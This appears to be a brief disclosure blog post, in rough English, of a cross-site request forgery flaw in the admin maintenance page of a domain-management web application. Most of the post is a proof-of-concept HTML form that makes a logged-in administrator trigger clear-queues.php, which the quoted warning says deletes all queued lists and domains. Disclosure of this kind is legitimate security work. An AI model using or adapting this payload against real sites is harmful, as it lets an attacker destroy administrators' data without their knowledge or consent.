CSRF

With warning "(WARNING: This will completely delete all queue lists and domains, regardless of their status. This should not be run until all legitimate lists and domains in the queue have been successfully processed.)" . This is probably that dangerous to handle. And that could be a target for hackers.

url : http://localhost/dm/admin/maintenance/
Step1: create POC CSRF:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/dm/admin/maintenance/clear-queues.php">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Step2:victim send request to request and delete log



Nhận xét